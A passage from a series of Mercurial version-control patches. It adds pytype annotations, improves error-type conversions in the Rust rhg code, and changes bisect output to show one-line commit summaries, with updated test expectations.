Trie""" if (len(data) % S_BLOCK.size) != 0: - msg = "nodemap data size is not a multiple of block size (%d): %d" + msg = b"nodemap data size is not a multiple of block size (%d): %d" raise error.Abort(msg % (S_BLOCK.size, len(data))) if not data: return Block(), None diff --git a/mercurial/sslutil.py b/mercurial/sslutil.py --- a/mercurial/sslutil.py +++ b/mercurial/sslutil.py @@ -269,7 
+269,7 @@ if b'SSLKEYLOGFILE' in encoding.environ: try: - import sslkeylog + import sslkeylog # pytype: disable=import-error sslkeylog.set_keylog( pycompat.fsdecode(encoding.environ[b'SSLKEYLOGFILE']) @@ -543,7 +543,9 @@ # Use the list of more secure ciphers if found in the ssl module. if util.safehasattr(ssl, b'_RESTRICTED_SERVER_CIPHERS'): sslcontext.options |= getattr(ssl, 'OP_CIPHER_SERVER_PREFERENCE', 0) + # pytype: disable=module-attr sslcontext.set_ciphers(ssl._RESTRICTED_SERVER_CIPHERS) + # pytype: enable=module-attr if requireclientcert: sslcontext.verify_mode = ssl.CERT_REQUIRED diff --git a/mercurial/subrepo.py b/mercurial/subrepo.py --- a/mercurial/subrepo.py +++ b/mercurial/subrepo.py @@ -1891,7 +1891,12 @@ if info.issym(): data = info.linkname else: - data = tar.extractfile(info).read() + f = tar.extractfile(info) + if f: + data = f.read() + else: + self.ui.warn(_(b'skipping "%s" (unknown type)') % bname) + continue archiver.addfile(prefix + bname, info.mode, info.issym(), data) total += 1 progress.increment() diff --git a/mercurial/testing/revlog.py b/mercurial/testing/revlog.py --- a/mercurial/testing/revlog.py +++ b/mercurial/testing/revlog.py @@ -24,7 +24,7 @@ try: - from ..cext import parsers as cparsers + from ..cext import parsers as cparsers # pytype: disable=import-error except ImportError: cparsers = None diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -581,6 +581,7 @@ # reference to its new location. So clean it up manually. Alternatively, we # could update srcrepo.svfs and other variables to point to the new # location. This is simpler. 
+ assert backupvfs is not None # help pytype backupvfs.unlink(b'store/lock') return backuppath diff --git a/mercurial/urllibcompat.py b/mercurial/urllibcompat.py --- a/mercurial/urllibcompat.py +++ b/mercurial/urllibcompat.py @@ -148,6 +148,7 @@ else: + # pytype: disable=import-error import BaseHTTPServer import CGIHTTPServer import SimpleHTTPServer @@ -155,6 +156,8 @@ import urllib import urlparse + # pytype: enable=import-error + urlreq._registeraliases( urllib, ( diff --git a/mercurial/utils/hashutil.py b/mercurial/utils/hashutil.py --- a/mercurial/utils/hashutil.py +++ b/mercurial/utils/hashutil.py @@ -3,7 +3,7 @@ import hashlib try: - from ..thirdparty import sha1dc + from ..thirdparty import sha1dc # pytype: disable=import-error sha1 = sha1dc.sha1 except (ImportError, AttributeError): diff --git a/mercurial/utils/procutil.py b/mercurial/utils/procutil.py --- a/mercurial/utils/procutil.py +++ b/mercurial/utils/procutil.py @@ -152,8 +152,8 @@ if pycompat.iswindows: # Work around Windows bugs. - stdout = platform.winstdout(stdout) - stderr = platform.winstdout(stderr) + stdout = platform.winstdout(stdout) # pytype: disable=module-attr + stderr = platform.winstdout(stderr) # pytype: disable=module-attr if isatty(stdout): # The standard library doesn't offer line-buffered binary streams. stdout = make_line_buffered(stdout) @@ -164,8 +164,8 @@ stderr = sys.stderr if pycompat.iswindows: # Work around Windows bugs. - stdout = platform.winstdout(stdout) - stderr = platform.winstdout(stderr) + stdout = platform.winstdout(stdout) # pytype: disable=module-attr + stderr = platform.winstdout(stderr) # pytype: disable=module-attr if isatty(stdout): if pycompat.iswindows: # The Windows C runtime library doesn't support line buffering. 
diff --git a/mercurial/utils/resourceutil.py b/mercurial/utils/resourceutil.py --- a/mercurial/utils/resourceutil.py +++ b/mercurial/utils/resourceutil.py @@ -70,12 +70,14 @@ ) def is_resource(package, name): - return resources.is_resource( + return resources.is_resource( # pytype: disable=module-attr pycompat.sysstr(package), encoding.strfromlocal(name) ) def contents(package): + # pytype: disable=module-attr for r in resources.contents(pycompat.sysstr(package)): + # pytype: enable=module-attr yield encoding.strtolocal(r) diff --git a/mercurial/verify.py b/mercurial/verify.py --- a/mercurial/verify.py +++ b/mercurial/verify.py @@ -14,6 +14,9 @@ nullid, short, ) +from .utils import ( + stringutil, +) from . import ( error, @@ -81,7 +84,7 @@ def _exc(self, linkrev, msg, inst, filename=None): """record exception raised during the verify process""" - fmsg = pycompat.bytestr(inst) + fmsg = stringutil.forcebytestr(inst) if not fmsg: fmsg = pycompat.byterepr(inst) self._err(linkrev, b"%s: %s" % (msg, fmsg), filename) @@ -431,6 +434,7 @@ filenodes.setdefault(f, {}).update(onefilenodes) if not dir and subdirnodes: + assert subdirprogress is not None # help pytype subdirprogress.complete() if self.warnorphanstorefiles: for f in sorted(storefiles): diff --git a/mercurial/win32.py b/mercurial/win32.py --- a/mercurial/win32.py +++ b/mercurial/win32.py @@ -20,10 +20,12 @@ pycompat, ) +# pytype: disable=module-attr _kernel32 = ctypes.windll.kernel32 _advapi32 = ctypes.windll.advapi32 _user32 = ctypes.windll.user32 _crypt32 = ctypes.windll.crypt32 +# pytype: enable=module-attr _BOOL = ctypes.c_long _WORD = ctypes.c_ushort @@ -311,7 +313,9 @@ _kernel32.GetCurrentProcessId.argtypes = [] _kernel32.GetCurrentProcessId.restype = _DWORD +# pytype: disable=module-attr _SIGNAL_HANDLER = ctypes.WINFUNCTYPE(_BOOL, _DWORD) +# pytype: enable=module-attr _kernel32.SetConsoleCtrlHandler.argtypes = [_SIGNAL_HANDLER, _BOOL] _kernel32.SetConsoleCtrlHandler.restype = _BOOL @@ -336,7 +340,9 @@ 
_user32.ShowWindow.argtypes = [_HANDLE, ctypes.c_int] _user32.ShowWindow.restype = _BOOL +# pytype: disable=module-attr _WNDENUMPROC = ctypes.WINFUNCTYPE(_BOOL, _HWND, _LPARAM) +# pytype: enable=module-attr _user32.EnumWindows.argtypes = [_WNDENUMPROC, _LPARAM] _user32.EnumWindows.restype = _BOOL @@ -357,7 +363,7 @@ code = _kernel32.GetLastError() if code > 0x7FFFFFFF: code -= 2 ** 32 - err = ctypes.WinError(code=code) + err = ctypes.WinError(code=code) # pytype: disable=module-attr raise OSError( err.errno, '%s: %s' % (encoding.strfromlocal(name), err.strerror) ) @@ -466,7 +472,7 @@ def peekpipe(pipe): - handle = msvcrt.get_osfhandle(pipe.fileno()) + handle = msvcrt.get_osfhandle(pipe.fileno()) # pytype: disable=module-attr avail = _DWORD() if not _kernel32.PeekNamedPipe( @@ -475,7 +481,7 @@ err = _kernel32.GetLastError() if err == _ERROR_BROKEN_PIPE: return 0 - raise ctypes.WinError(err) + raise ctypes.WinError(err) # pytype: disable=module-attr return avail.value @@ -506,10 +512,12 @@ size = 600 buf = ctypes.create_string_buffer(size + 1) len = _kernel32.GetModuleFileNameA(None, ctypes.byref(buf), size) + # pytype: disable=module-attr if len == 0: raise ctypes.WinError() # Note: WinError is a function elif len == size: raise ctypes.WinError(_ERROR_INSUFFICIENT_BUFFER) + # pytype: enable=module-attr return buf.value @@ -528,7 +536,8 @@ buf = ctypes.create_string_buffer(size) if not _kernel32.GetVolumePathNameA(realpath, ctypes.byref(buf), size): - raise ctypes.WinError() # Note: WinError is a function + # Note: WinError is a function + raise ctypes.WinError() # pytype: disable=module-attr return buf.value @@ -558,7 +567,8 @@ if not _kernel32.GetVolumeInformationA( volume, None, 0, None, None, None, ctypes.byref(name), size ): - raise ctypes.WinError() # Note: WinError is a function + # Note: WinError is a function + raise ctypes.WinError() # pytype: disable=module-attr return name.value @@ -568,7 +578,7 @@ size = _DWORD(300) buf = 
ctypes.create_string_buffer(size.value + 1) if not _advapi32.GetUserNameA(ctypes.byref(buf), ctypes.byref(size)): - raise ctypes.WinError() + raise ctypes.WinError() # pytype: disable=module-attr return buf.value @@ -589,7 +599,7 @@ h = _SIGNAL_HANDLER(handler) _signalhandler.append(h) # needed to prevent garbage collection if not _kernel32.SetConsoleCtrlHandler(h, True): - raise ctypes.WinError() + raise ctypes.WinError() # pytype: disable=module-attr def hidewindow(): @@ -686,7 +696,7 @@ ctypes.byref(pi), ) if not res: - raise ctypes.WinError() + raise ctypes.WinError() # pytype: disable=module-attr _kernel32.CloseHandle(pi.hProcess) _kernel32.CloseHandle(pi.hThread) diff --git a/mercurial/wireprotoserver.py b/mercurial/wireprotoserver.py --- a/mercurial/wireprotoserver.py +++ b/mercurial/wireprotoserver.py @@ -24,6 +24,7 @@ from .utils import ( cborutil, compression, + stringutil, ) stringio = util.stringio @@ -233,10 +234,12 @@ except hgwebcommon.ErrorResponse as e: for k, v in e.headers: res.headers[k] = v - res.status = hgwebcommon.statusmessage(e.code, pycompat.bytestr(e)) + res.status = hgwebcommon.statusmessage( + e.code, stringutil.forcebytestr(e) + ) # TODO This response body assumes the failed command was # "unbundle." That assumption is not always valid. 
- res.setbodybytes(b'0\n%s\n' % pycompat.bytestr(e)) + res.setbodybytes(b'0\n%s\n' % stringutil.forcebytestr(e)) return True diff --git a/mercurial/wireprotov2server.py b/mercurial/wireprotov2server.py --- a/mercurial/wireprotov2server.py +++ b/mercurial/wireprotov2server.py @@ -88,7 +88,9 @@ try: checkperm(rctx, req, b'pull' if permission == b'ro' else b'push') except hgwebcommon.ErrorResponse as e: - res.status = hgwebcommon.statusmessage(e.code, pycompat.bytestr(e)) + res.status = hgwebcommon.statusmessage( + e.code, stringutil.forcebytestr(e) + ) for k, v in e.headers: res.headers[k] = v res.setbodybytes(b'permission denied') diff --git a/mercurial/worker.py b/mercurial/worker.py --- a/mercurial/worker.py +++ b/mercurial/worker.py @@ -104,7 +104,9 @@ else: def ismainthread(): + # pytype: disable=module-attr return isinstance(threading.current_thread(), threading._MainThread) + # pytype: enable=module-attr def _blockingreader(wrapped): return wrapped diff --git a/tests/test-rebase-conflicts.t b/tests/test-rebase-conflicts.t --- a/tests/test-rebase-conflicts.t +++ b/tests/test-rebase-conflicts.t @@ -276,13 +276,13 @@ committing manifest committing changelog updating the branch cache - rebased as 2a7f09cac94c + rebased as c1ffa3b5274e rebase status stored rebase merging completed update back to initial working directory parent resolving manifests branchmerge: False, force: False, partial: False - ancestor: 2a7f09cac94c, local: 2a7f09cac94c+, remote: d79e2059b5c0 + ancestor: c1ffa3b5274e, local: c1ffa3b5274e+, remote: d79e2059b5c0 f1.txt: other deleted -> r removing f1.txt f2.txt: remote created -> g @@ -300,7 +300,7 @@ list of changesets: 4c9fbe56a16f30c0d5dcc40ec1a97bbe3325209c 19c888675e133ab5dff84516926a65672eaf04d9 - 2a7f09cac94c7f4b73ebd5cd1a62d3b2e8e336bf + c1ffa3b5274e92a9388fe782854e295d2e8d0443 bundle2-output-bundle: "HG20", 3 parts total bundle2-output-part: "changegroup" (params: 1 mandatory 1 advisory) streamed payload bundle2-output-part: 
"cache:rev-branch-cache" (advisory) streamed payload @@ -311,7 +311,7 @@ adding changesets add changeset 4c9fbe56a16f add changeset 19c888675e13 - add changeset 2a7f09cac94c + add changeset c1ffa3b5274e adding manifests adding file changes adding f1.txt revisions # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1616193269 -3600 # Fri Mar 19 23:34:29 2021 +0100 # Node ID 048beb0167a7df73098419d899e0a9ed52bbe76b # Parent e2f7b2695ba153eb7c03b93e3d6a70ac0c82fb59 git: fix missing case from 6266d19556ad (introduction of nodeconstants) Differential Revision: https://phab.mercurial-scm.org/D10241 diff --git a/hgext/git/gitlog.py b/hgext/git/gitlog.py --- a/hgext/git/gitlog.py +++ b/hgext/git/gitlog.py @@ -218,7 +218,7 @@ n = nodeorrev # handle looking up nullid if n == nullid: - return hgchangelog._changelogrevision(extra={}) + return hgchangelog._changelogrevision(extra={}, manifest=nullid) hn = gitutil.togitnode(n) # We've got a real commit! files = [ # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1616194306 -3600 # Fri Mar 19 23:51:46 2021 +0100 # Node ID 38f55ef058fb2bb407aae71f1f2d5af509193938 # Parent 048beb0167a7df73098419d899e0a9ed52bbe76b tests: resort to fix test with newer git versions Differential Revision: https://phab.mercurial-scm.org/D10242 diff --git a/tests/test-git-interop.t b/tests/test-git-interop.t --- a/tests/test-git-interop.t +++ b/tests/test-git-interop.t @@ -28,9 +28,9 @@ $ hg status abort: repository specified git format in .hg/requires but has no .git directory [255] + $ git config --global init.defaultBranch master $ git init Initialized empty Git repository in $TESTTMP/nogit/.git/ - $ git config --global init.defaultBranch master This status invocation shows some hg gunk because we didn't use `hg init --git`, which fixes up .git/info/exclude for us. 
$ hg status # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1616156333 -3600 # Fri Mar 19 13:18:53 2021 +0100 # Node ID bcdcb4423ae3dfef2abd6865dbe5f4083bf77cfb # Parent 38f55ef058fb2bb407aae71f1f2d5af509193938 rhg: Add more conversions between error types This allows using the `?` operator in more places, as the next commit does. Differential Revision: https://phab.mercurial-scm.org/D10238 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -17,6 +17,7 @@ use format_bytes::{write_bytes, DisplayBytes}; use std::collections::HashSet; use std::env; +use std::fmt; use std::path::{Path, PathBuf}; use std::str; @@ -68,6 +69,21 @@ pub expected_type: &'static str, } +impl fmt::Display for ConfigValueParseError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + // TODO: add origin and line number information, here and in + // corresponding python code + write!( + f, + "config error: {}.{} is not a {} ('{}')", + String::from_utf8_lossy(&self.section), + String::from_utf8_lossy(&self.item), + self.expected_type, + String::from_utf8_lossy(&self.value) + ) + } +} + impl Config { /// Load system and user configuration from various files. 
/// diff --git a/rust/hg-core/src/errors.rs b/rust/hg-core/src/errors.rs --- a/rust/hg-core/src/errors.rs +++ b/rust/hg-core/src/errors.rs @@ -88,25 +88,7 @@ HgError::UnsupportedFeature(explanation) => { write!(f, "unsupported feature: {}", explanation) } - HgError::ConfigValueParseError(ConfigValueParseError { - origin: _, - line: _, - section, - item, - value, - expected_type, - }) => { - // TODO: add origin and line number information, here and in - // corresponding python code - write!( - f, - "config error: {}.{} is not a {} ('{}')", - String::from_utf8_lossy(section), - String::from_utf8_lossy(item), - expected_type, - String::from_utf8_lossy(value) - ) - } + HgError::ConfigValueParseError(error) => error.fmt(f), } } } diff --git a/rust/hg-core/src/lib.rs b/rust/hg-core/src/lib.rs --- a/rust/hg-core/src/lib.rs +++ b/rust/hg-core/src/lib.rs @@ -17,7 +17,8 @@ dirstate_map::DirstateMap, parsers::{pack_dirstate, parse_dirstate, PARENT_SIZE}, status::{ - status, BadMatch, BadType, DirstateStatus, StatusError, StatusOptions, + status, BadMatch, BadType, DirstateStatus, HgPathCow, StatusError, + StatusOptions, }, CopyMap, CopyMapIter, DirstateEntry, DirstateParents, EntryState, StateMap, StateMapIter, diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -2,11 +2,12 @@ use crate::ui::UiError; use crate::NoRepoInCwdError; use format_bytes::format_bytes; -use hg::config::{ConfigError, ConfigParseError}; +use hg::config::{ConfigError, ConfigParseError, ConfigValueParseError}; use hg::errors::HgError; use hg::repo::RepoError; use hg::revlog::revlog::RevlogError; use hg::utils::files::get_bytes_from_path; +use hg::{DirstateError, DirstateMapError, StatusError}; use std::convert::From; /// The kind of command error @@ -61,6 +62,12 @@ } } +impl From<ConfigValueParseError> for CommandError { + fn from(error: ConfigValueParseError) -> Self { + CommandError::abort(error.to_string()) + } +} + impl From<UiError> 
for CommandError { fn from(_error: UiError) -> Self { // If we already failed writing to stdout or stderr, @@ -144,3 +151,24 @@ } } } + +impl From<StatusError> for CommandError { + fn from(error: StatusError) -> Self { + CommandError::abort(format!("{}", error)) + } +} + +impl From<DirstateMapError> for CommandError { + fn from(error: DirstateMapError) -> Self { + CommandError::abort(format!("{}", error)) + } +} + +impl From<DirstateError> for CommandError { + fn from(error: DirstateError) -> Self { + match error { + DirstateError::Common(error) => error.into(), + DirstateError::Map(error) => error.into(), + } + } +} # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616220969 25200 # Fri Mar 19 23:16:09 2021 -0700 # Node ID f51ff655d338427150ab0fb23fd4c02136cae228 # Parent bcdcb4423ae3dfef2abd6865dbe5f4083bf77cfb bisect: use standard one-line commit summary This makes bisect use the standardized support for one-line commit summary I added a while back. That means that it will respect the `command-templates.oneline-summary` config. If also means that the default output now includes the first line of the commit message (see test impact). 
Differential Revision: https://phab.mercurial-scm.org/D10245 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -1107,9 +1107,8 @@ transition = b"bad" state[transition].append(node) ctx = repo[node] - ui.status( - _(b'changeset %d:%s: %s\n') % (ctx.rev(), ctx, transition) - ) + summary = cmdutil.format_changeset_summary(ui, ctx, b'bisect') + ui.status(_(b'changeset %s: %s\n') % (summary, transition)) hbisect.checkstate(state) # bisect nodes, changesets, bgood = hbisect.bisect(repo, state) @@ -1125,15 +1124,15 @@ nodes, changesets, good = hbisect.bisect(repo, state) if extend: if not changesets: - extendnode = hbisect.extendrange(repo, state, nodes, good) - if extendnode is not None: + extendctx = hbisect.extendrange(repo, state, nodes, good) + if extendctx is not None: ui.write( - _(b"Extending search to changeset %d:%s\n") - % (extendnode.rev(), extendnode) + _(b"Extending search to changeset %s\n") + % cmdutil.format_changeset_summary(ui, extendctx, b'bisect') ) - state[b'current'] = [extendnode.node()] + state[b'current'] = [extendctx.node()] hbisect.save_state(repo, state) - return mayupdate(repo, extendnode.node()) + return mayupdate(repo, extendctx.node()) raise error.StateError(_(b"nothing to extend")) if changesets == 0: @@ -1146,12 +1145,13 @@ while size <= changesets: tests, size = tests + 1, size * 2 rev = repo.changelog.rev(node) + summary = cmdutil.format_changeset_summary(ui, repo[rev], b'bisect') ui.write( _( - b"Testing changeset %d:%s " + b"Testing changeset %s " b"(%d changesets remaining, ~%d tests)\n" ) - % (rev, short(node), changesets, tests) + % (summary, changesets, tests) ) state[b'current'] = [node] hbisect.save_state(repo, state) diff --git a/tests/test-bisect.t b/tests/test-bisect.t --- a/tests/test-bisect.t +++ b/tests/test-bisect.t @@ -200,25 +200,25 @@ update: (current) phases: 32 draft $ hg bisect -g 1 - Testing changeset 16:a2e6ea4973e9 (30 changesets remaining, ~4 
tests) + Testing changeset 16:a2e6ea4973e9 "msg 16" (30 changesets remaining, ~4 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 23:5ec79163bff4 (15 changesets remaining, ~3 tests) + Testing changeset 23:5ec79163bff4 "msg 23" (15 changesets remaining, ~3 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved skip $ hg bisect -s - Testing changeset 24:10e0acd3809e (15 changesets remaining, ~3 tests) + Testing changeset 24:10e0acd3809e "msg 24" (15 changesets remaining, ~3 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 27:288867a866e9 (7 changesets remaining, ~2 tests) + Testing changeset 27:288867a866e9 "msg 27" (7 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 29:b5bd63375ab9 (4 changesets remaining, ~2 tests) + Testing changeset 29:b5bd63375ab9 "msg 29" (4 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -b - Testing changeset 28:8e0c2264c8af (2 changesets remaining, ~1 tests) + Testing changeset 28:8e0c2264c8af "msg 28" (2 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g The first bad revision is: @@ -234,7 +234,7 @@ $ hg bisect -b "0::3" $ hg bisect -s "13::16" $ hg bisect -g "26::tip" - Testing changeset 12:1941b52820a5 (23 changesets remaining, ~4 tests) + Testing changeset 12:1941b52820a5 "msg 12" (23 changesets remaining, ~4 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ cat .hg/bisect.state bad b99c7b9c8e11558adef3fad9af211c58d46f325b @@ -258,25 +258,25 @@ $ hg bisect -r $ hg bisect -b null $ hg bisect -g tip - Testing changeset 15:e7fa0811edb0 (32 changesets remaining, ~5 tests) + Testing changeset 15:e7fa0811edb0 "msg 15" (32 changesets remaining, ~5 tests) 1 
files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 7:03750880c6b5 (16 changesets remaining, ~4 tests) + Testing changeset 7:03750880c6b5 "msg 7" (16 changesets remaining, ~4 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved skip $ hg bisect -s - Testing changeset 6:a3d5c6fdf0d3 (16 changesets remaining, ~4 tests) + Testing changeset 6:a3d5c6fdf0d3 "msg 6" (16 changesets remaining, ~4 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 2:db07c04beaca (7 changesets remaining, ~2 tests) + Testing changeset 2:db07c04beaca "msg 2" (7 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 0:b99c7b9c8e11 (3 changesets remaining, ~1 tests) + Testing changeset 0:b99c7b9c8e11 "msg 0" (3 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -b - Testing changeset 1:5cd978ea5149 (2 changesets remaining, ~1 tests) + Testing changeset 1:5cd978ea5149 "msg 1" (2 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g The first good revision is: @@ -295,7 +295,7 @@ $ hg bisect -r $ hg bisect -g null $ hg bisect -bU tip - Testing changeset 15:e7fa0811edb0 (32 changesets remaining, ~5 tests) + Testing changeset 15:e7fa0811edb0 "msg 15" (32 changesets remaining, ~5 tests) $ hg id 5cd978ea5149 @@ -306,13 +306,13 @@ $ hg bisect -r $ hg bisect -b 4 $ hg bisect -g 0 - Testing changeset 2:db07c04beaca (4 changesets remaining, ~2 tests) + Testing changeset 2:db07c04beaca "msg 2" (4 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 1:5cd978ea5149 (4 changesets remaining, ~2 tests) + Testing changeset 1:5cd978ea5149 "msg 1" (4 changesets remaining, ~2 tests) 1 files updated, 0 
files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 3:b53bea5e2fcb (4 changesets remaining, ~2 tests) + Testing changeset 3:b53bea5e2fcb "msg 3" (4 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s Due to skipped revisions, the first bad revision could be any of: @@ -343,7 +343,7 @@ $ hg bisect -r $ hg bisect -g 0 $ hg bisect -b 2 - Testing changeset 1:5cd978ea5149 (2 changesets remaining, ~1 tests) + Testing changeset 1:5cd978ea5149 "msg 1" (2 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s Due to skipped revisions, the first bad revision could be any of: @@ -372,19 +372,19 @@ $ hg bisect -r $ hg bisect -b 6 $ hg bisect -g 0 - Testing changeset 3:b53bea5e2fcb (6 changesets remaining, ~2 tests) + Testing changeset 3:b53bea5e2fcb "msg 3" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 2:db07c04beaca (6 changesets remaining, ~2 tests) + Testing changeset 2:db07c04beaca "msg 2" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 4:9b2ba8336a65 (6 changesets remaining, ~2 tests) + Testing changeset 4:9b2ba8336a65 "msg 4" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 1:5cd978ea5149 (6 changesets remaining, ~2 tests) + Testing changeset 1:5cd978ea5149 "msg 1" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 5:7874a09ea728 (6 changesets remaining, ~2 tests) + Testing changeset 5:7874a09ea728 "msg 5" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g The first bad revision is: @@ -473,17 
+473,17 @@ $ hg bisect -r $ hg up -qr tip $ hg bisect --command "\"$PYTHON\" \"$TESTTMP/script.py\" and some parameters" - changeset 31:58c80a7c8a40: good + changeset 31:58c80a7c8a40 tip "msg 31": good abort: cannot bisect (no known bad revisions) [20] $ hg up -qr 0 $ hg bisect --command "\"$PYTHON\" \"$TESTTMP/script.py\" and some parameters" - changeset 0:b99c7b9c8e11: bad - changeset 15:e7fa0811edb0: good - changeset 7:03750880c6b5: good - changeset 3:b53bea5e2fcb: bad - changeset 5:7874a09ea728: bad - changeset 6:a3d5c6fdf0d3: good + changeset 0:b99c7b9c8e11 "msg 0": bad + changeset 15:e7fa0811edb0 "msg 15": good + changeset 7:03750880c6b5 "msg 7": good + changeset 3:b53bea5e2fcb "msg 3": bad + changeset 5:7874a09ea728 "msg 5": bad + changeset 6:a3d5c6fdf0d3 "msg 6": good The first good revision is: changeset: 6:a3d5c6fdf0d3 user: test @@ -510,13 +510,13 @@ $ hg bisect -r $ hg bisect --good tip --noupdate $ hg bisect --bad 0 --noupdate - Testing changeset 15:e7fa0811edb0 (31 changesets remaining, ~4 tests) + Testing changeset 15:e7fa0811edb0 "msg 15" (31 changesets remaining, ~4 tests) $ hg bisect --command "sh \"$TESTTMP/script.sh\" and some params" --noupdate - changeset 15:e7fa0811edb0: good - changeset 7:03750880c6b5: good - changeset 3:b53bea5e2fcb: bad - changeset 5:7874a09ea728: bad - changeset 6:a3d5c6fdf0d3: good + changeset 15:e7fa0811edb0 "msg 15": good + changeset 7:03750880c6b5 "msg 7": good + changeset 3:b53bea5e2fcb "msg 3": bad + changeset 5:7874a09ea728 "msg 5": bad + changeset 6:a3d5c6fdf0d3 "msg 6": good The first good revision is: changeset: 6:a3d5c6fdf0d3 user: test @@ -543,17 +543,17 @@ $ hg bisect -r $ hg up -qr tip $ hg bisect --command "sh \"$TESTTMP/script.sh\" and some params" - changeset 31:58c80a7c8a40: good + changeset 31:58c80a7c8a40 tip "msg 31": good abort: cannot bisect (no known bad revisions) [20] $ hg up -qr 0 $ hg bisect --command "sh \"$TESTTMP/script.sh\" and some params" - changeset 0:b99c7b9c8e11: bad - changeset 
15:e7fa0811edb0: good - changeset 7:03750880c6b5: good - changeset 3:b53bea5e2fcb: bad - changeset 5:7874a09ea728: bad - changeset 6:a3d5c6fdf0d3: good + changeset 0:b99c7b9c8e11 "msg 0": bad + changeset 15:e7fa0811edb0 "msg 15": good + changeset 7:03750880c6b5 "msg 7": good + changeset 3:b53bea5e2fcb "msg 3": bad + changeset 5:7874a09ea728 "msg 5": bad + changeset 6:a3d5c6fdf0d3 "msg 6": good The first good revision is: changeset: 6:a3d5c6fdf0d3 user: test @@ -586,13 +586,13 @@ $ hg bisect --reset $ hg bisect --good 15 $ hg bisect --bad 30 - Testing changeset 22:06c7993750ce (15 changesets remaining, ~3 tests) + Testing changeset 22:06c7993750ce "msg 22" (15 changesets remaining, ~3 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect --command true - changeset 22:06c7993750ce: good - changeset 26:3efc6fd51aeb: good - changeset 28:8e0c2264c8af: good - changeset 29:b5bd63375ab9: good + changeset 22:06c7993750ce "msg 22": good + changeset 26:3efc6fd51aeb "msg 26": good + changeset 28:8e0c2264c8af "msg 28": good + changeset 29:b5bd63375ab9 "msg 29": good The first bad revision is: changeset: 30:ed2d2f24b11c tag: tip @@ -735,11 +735,11 @@ $ hg bisect --reset $ hg bisect --good . 
$ hg bisect --bad 25 - Testing changeset 28:8e0c2264c8af (6 changesets remaining, ~2 tests) + Testing changeset 28:8e0c2264c8af "msg 28" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect --command true - changeset 28:8e0c2264c8af: good - changeset 26:3efc6fd51aeb: good + changeset 28:8e0c2264c8af "msg 28": good + changeset 26:3efc6fd51aeb "msg 26": good The first good revision is: changeset: 26:3efc6fd51aeb user: test diff --git a/tests/test-bisect2.t b/tests/test-bisect2.t --- a/tests/test-bisect2.t +++ b/tests/test-bisect2.t @@ -252,7 +252,7 @@ $ hg bisect -r $ hg bisect -g 0 $ hg bisect -b 17 # -> update to rev 6 - Testing changeset 6:a214d5d3811a (15 changesets remaining, ~3 tests) + Testing changeset 6:a214d5d3811a "merge 4,5" (15 changesets remaining, ~3 tests) 0 files updated, 0 files merged, 2 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -274,16 +274,16 @@ 16:609d82a7ebae $ hg log -q -r 'bisect(ignored)' $ hg bisect -g # -> update to rev 13 - Testing changeset 13:b0a32c86eb31 (9 changesets remaining, ~3 tests) + Testing changeset 13:b0a32c86eb31 "13" (9 changesets remaining, ~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 10 - Testing changeset 10:429fcd26f52d (9 changesets remaining, ~3 tests) + Testing changeset 10:429fcd26f52d "merge 6,9" (9 changesets remaining, ~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -b # -> update to rev 8 - Testing changeset 8:dab8161ac8fc (3 changesets remaining, ~1 tests) + Testing changeset 8:dab8161ac8fc "8" (3 changesets remaining, ~1 tests) 2 files 